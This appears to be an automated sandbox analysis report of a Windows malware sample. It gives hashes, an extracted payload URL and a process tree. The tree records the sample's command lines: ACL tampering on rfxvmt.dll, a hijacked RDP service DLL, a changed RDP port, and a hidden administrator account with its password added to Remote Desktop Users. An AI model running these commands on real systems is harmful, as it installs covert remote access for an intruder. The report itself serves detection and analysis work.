Analysis
-
max time kernel
131s -
max time network
121s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
08-11-2020 17:46
Static task
static1
Behavioral task
behavioral1
Sample
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
Resource
win10v20201028
General
-
Target
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
-
Size
3.5MB
-
MD5
7e806fd5ef516e10a4e4a5362fbc600b
-
SHA1
edb1b43d7578f170f259958663ace80a01718dc8
-
SHA256
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b
-
SHA512
30544680de5f5af999cbbba6d632acb4319c370bf526b23cde5e8f40172b97d885608e5a9b086d1cd2df6ee97cc5bb51bb9bf74a742d5866dcca2c58b6c2dbd8
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 6 1524 powershell.exe 8 1524 powershell.exe 10 1524 powershell.exe 11 1524 powershell.exe 13 1524 powershell.exe 15 1524 powershell.exe 17 1524 powershell.exe 19 1524 powershell.exe 21 1524 powershell.exe 23 1524 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1592 icacls.exe 1168 takeown.exe 928 icacls.exe 820 icacls.exe 1892 icacls.exe 1780 icacls.exe 388 icacls.exe 1596 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1520 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 776 776 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 820 icacls.exe 1892 icacls.exe 1780 icacls.exe 388 icacls.exe 1596 icacls.exe 1592 icacls.exe 1168 takeown.exe 928 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 41 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b2fcaef4-fe23-4bce-824b-6f6358e02795 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1392e70e-8760-49f9-8db6-9210f73c194f powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE7E2.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE812.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE99A.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9FE.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OC4OCEVQ0O8MTHG64QLV.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6ca124d-2b16-44b3-b580-ffcbc351d963 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE762.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE7E1.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE99B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9AC.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f47bda0-737c-4ae9-85f7-27ae6ff58d6b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f637b8f2-be9c-4cd3-9bb2-8473715f4eed powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9AB.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9FD.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEA20.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_97d0585d-0c74-4d3a-b7b3-e44078483ccf powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d9e07f56-99aa-4761-adbb-7ee46037c24c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4936f899-a790-4ea7-91ea-f8cbd194919f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3add778d-4d46-412c-aff1-6168a6ec4152 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9DC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9DD.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEA1F.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b790b175-d71f-400d-a665-dc041bfbf95a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ba969b79-46fa-4f1b-9437-043abed65c8d powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE763.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE813.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70a9bef30bb6d601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 1524 powershell.exe 1524 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 464 776 776 776 776 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1520 powershell.exe Token: SeRestorePrivilege 820 icacls.exe Token: SeAssignPrimaryTokenPrivilege 304 WMIC.exe Token: SeIncreaseQuotaPrivilege 304 WMIC.exe Token: SeAuditPrivilege 304 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 304 WMIC.exe Token: SeIncreaseQuotaPrivilege 304 WMIC.exe Token: SeAuditPrivilege 304 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1780 WMIC.exe Token: SeIncreaseQuotaPrivilege 1780 WMIC.exe Token: SeAuditPrivilege 1780 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1780 WMIC.exe Token: SeIncreaseQuotaPrivilege 1780 WMIC.exe Token: SeAuditPrivilege 1780 WMIC.exe Token: SeDebugPrivilege 1524 powershell.exe -
Suspicious use of WriteProcessMemory 133 IoCs
Processes:
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exepowershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 1640 wrote to memory of 1520 1640 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe powershell.exe PID 1640 wrote to memory of 1520 1640 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe powershell.exe PID 1640 wrote to memory of 1520 1640 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe powershell.exe PID 1640 wrote to memory of 1520 1640 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe powershell.exe PID 1520 wrote to memory of 1688 1520 powershell.exe csc.exe PID 1520 wrote to memory of 1688 1520 powershell.exe csc.exe PID 1520 wrote to memory of 1688 1520 powershell.exe csc.exe PID 1688 wrote to memory of 1084 1688 csc.exe cvtres.exe PID 1688 wrote to memory of 1084 1688 csc.exe cvtres.exe PID 1688 wrote to memory of 1084 1688 csc.exe cvtres.exe PID 1520 wrote to memory of 1168 1520 powershell.exe takeown.exe PID 1520 wrote to memory of 1168 1520 powershell.exe takeown.exe PID 1520 wrote to memory of 1168 1520 powershell.exe takeown.exe PID 1520 wrote to memory of 928 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 928 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 928 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 820 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 820 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 820 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1892 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1892 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1892 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1780 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1780 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1780 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 388 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 388 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 388 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1596 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1596 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1596 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1592 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1592 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1592 1520 powershell.exe icacls.exe PID 1520 wrote to memory of 1684 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1684 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1684 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1752 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1752 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1752 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1268 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1268 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1268 1520 powershell.exe reg.exe PID 1520 wrote to memory of 1612 1520 powershell.exe net.exe PID 1520 wrote to memory of 1612 1520 powershell.exe net.exe PID 1520 wrote to memory of 1612 1520 powershell.exe net.exe PID 1612 wrote to memory of 2008 1612 net.exe net1.exe PID 1612 wrote to memory of 2008 1612 net.exe net1.exe PID 1612 wrote to memory of 2008 1612 net.exe net1.exe PID 1520 wrote to memory of 1648 1520 powershell.exe cmd.exe PID 1520 wrote to memory of 1648 1520 powershell.exe cmd.exe PID 1520 wrote to memory of 1648 1520 powershell.exe cmd.exe PID 1648 wrote to memory of 1100 1648 cmd.exe cmd.exe PID 1648 wrote to memory of 1100 1648 cmd.exe cmd.exe PID 1648 wrote to memory of 1100 1648 cmd.exe cmd.exe PID 1100 wrote to memory of 1084 1100 cmd.exe net.exe PID 1100 wrote to memory of 1084 1100 cmd.exe net.exe PID 1100 wrote to memory of 1084 1100 cmd.exe net.exe PID 1084 wrote to memory of 1092 1084 net.exe net1.exe PID 1084 wrote to memory of 1092 1084 net.exe net1.exe PID 1084 wrote to memory of 1092 1084 net.exe net1.exe PID 1520 wrote to memory of 332 1520 powershell.exe cmd.exe PID 1520 wrote to memory of 332 1520 powershell.exe cmd.exe PID 1520 wrote to memory of 332 1520 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe"C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6420.tmp" "c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\CSCECA57343D3A14B89AA49B14023A79037.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc wlgHGI30 /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc wlgHGI30 /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc wlgHGI30 /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc wlgHGI301⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc wlgHGI302⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc wlgHGI303⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
